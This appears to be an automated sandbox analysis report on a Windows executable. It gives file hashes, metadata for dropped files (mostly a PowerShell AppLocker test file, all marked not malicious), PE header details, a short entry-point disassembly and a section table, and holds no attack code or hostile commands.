                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:modified
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Users\user\Desktop\1feP5qTCl0.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):19
                          Entropy (8bit):3.366091329119193
                          Encrypted:false
                          SSDEEP:3:hMCE/N:hul
                          MD5:F92A9EF0567DB794EFBE6CC7D98974CC
                          SHA1:51728A8A25C4F2805984F294DADCE85E738B90D9
                          SHA-256:26D96E97CEE88C873CFA14F364E79DAE57265CF8DA97ED1EA65A66A5EC6AD673
                          SHA-512:14C3C14D4E4D93619C0982BB22BD73930531F510C281BE2E8B1EC6C92F1E1CDCE11AC90F13D8F1F6EE79AAA88711B54AD119A16EE51582A2C6ED4071A5C9684A
                          Malicious:false
                          Preview:This is a new file.
                          File type:PE32+ executable (GUI) x86-64, for MS Windows
                          Entropy (8bit):6.958055025032026
                          TrID:
                          • Win64 Executable GUI (202006/5) 92.65%
                          • Win64 Executable (generic) (12005/4) 5.51%
                          • Generic Win/DOS Executable (2004/3) 0.92%
                          • DOS Executable Generic (2002/1) 0.92%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:1feP5qTCl0.exe
                          File size:8'077'824 bytes
                          MD5:a499c507987982c951093e21df0c0d96
                          SHA1:fa1a7050198570e016fc4bf3ddd69160e05a8a38
                          SHA256:64aaffe3b4d705b9ddbce60e8fd8b9829c20438b8c68ae254e185c0f466e0265
                          SHA512:0ab3d225fc8901d9cc1719ee61e0cdb444532f8a43b307382e7f3e5d610bcf1d54b5abef23649c370e5e960366270d99d94629e47868ae7959522a54d574a27d
                          SSDEEP:98304:ha48jDV5s44tAbCEAVomRGM6oCRXpqALGFFV/lz8RY5ui2R:haV5s4ZPAunVRZXGxlz8cuF
                          TLSH:AD868D47FC9545A9C1EEA330C9729252BA71BC495B3123D72B50F3382FB6BD1AA79700
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.........u......."......~&...................@...........................................`... ............................
                          Icon Hash:90cececece8e8eb0
                          Entrypoint:0x46dca0
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                          Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:6
                          OS Version Minor:1
                          File Version Major:6
                          File Version Minor:1
                          Subsystem Version Major:6
                          Subsystem Version Minor:1
                          Import Hash:c2d457ad8ac36fc9f18d45bffcd450c2
                          Instruction
                          jmp 00007F3A8CD554C0h
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          push ebp
                          dec eax
                          mov ebp, esp
                          pushfd
                          cld
                          dec eax
                          sub esp, 000000E0h
                          dec eax
                          mov dword ptr [esp], edi
                          dec eax
                          mov dword ptr [esp+08h], esi
                          dec eax
                          mov dword ptr [esp+10h], ebp
                          dec eax
                          mov dword ptr [esp+18h], ebx
                          dec esp
                          mov dword ptr [esp+20h], esp
                          dec esp
                          mov dword ptr [esp+28h], ebp
                          dec esp
                          mov dword ptr [esp+30h], esi
                          dec esp
                          mov dword ptr [esp+38h], edi
                          movups dqword ptr [esp+40h], xmm6
                          movups dqword ptr [esp+50h], xmm7
                          inc esp
                          movups dqword ptr [esp+60h], xmm0
                          inc esp
                          movups dqword ptr [esp+70h], xmm1
                          inc esp
                          movups dqword ptr [esp+00000080h], xmm2
                          inc esp
                          movups dqword ptr [esp+00000090h], xmm3
                          inc esp
                          movups dqword ptr [esp+000000A0h], xmm4
                          inc esp
                          movups dqword ptr [esp+000000B0h], xmm5
                          inc esp
                          movups dqword ptr [esp+000000C0h], xmm6
                          inc esp
                          movups dqword ptr [esp+000000D0h], xmm7
                          inc ebp
                          xorps xmm7, xmm7
                          dec ebp
                          xor esi, esi
                          dec eax
                          mov eax, dword ptr [00537492h]
                          dec eax
                          mov eax, dword ptr [eax]
                          dec eax
                          cmp eax, 00000000h
                          je 00007F3A8CD58DA5h
                          dec esp
                          mov esi, dword ptr [eax]
                          dec eax
                          sub esp, 10h
                          dec eax
                          mov eax, ecx
                          dec eax
                          mov ebx, edx
                          call 00007F3A8CD5979Bh
                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x7e20000x554.idata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x5ac0000xe058.pdata
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x7e30000xb014.reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x4e01c00x180.data
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x10000x267c350x267e00558cfebf470ac7a812584396a05e84f9unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rdata0x2690000x2768e80x276a002ae35a91a15fad23296fb42fc5427a4aunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .data0x4e00000xcb7c00x3d40037f6d23a8f05c65492830f2f2d706208False0.37782605229591837data4.799848116580347IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .pdata0x5ac0000xe0580xe2005cebb7c73df2da6f6181d74968b9e7feFalse0.40153138827433627data5.465582290244562IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .xdata0x5bb0000xb40x200dbbf65544a89803849c8b94bb72da141False0.2265625shared library1.787112262798912IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          /40x5bc0000x1290x20017f62672c8506464ae13eccc2eb6cb94False0.623046875data5.081946473254993IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          /190x5bd0000x6ca5f0x6cc001fccec32ee0f95cdbe651a6208db1bb1False0.9991581357758621data7.996511841637044IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
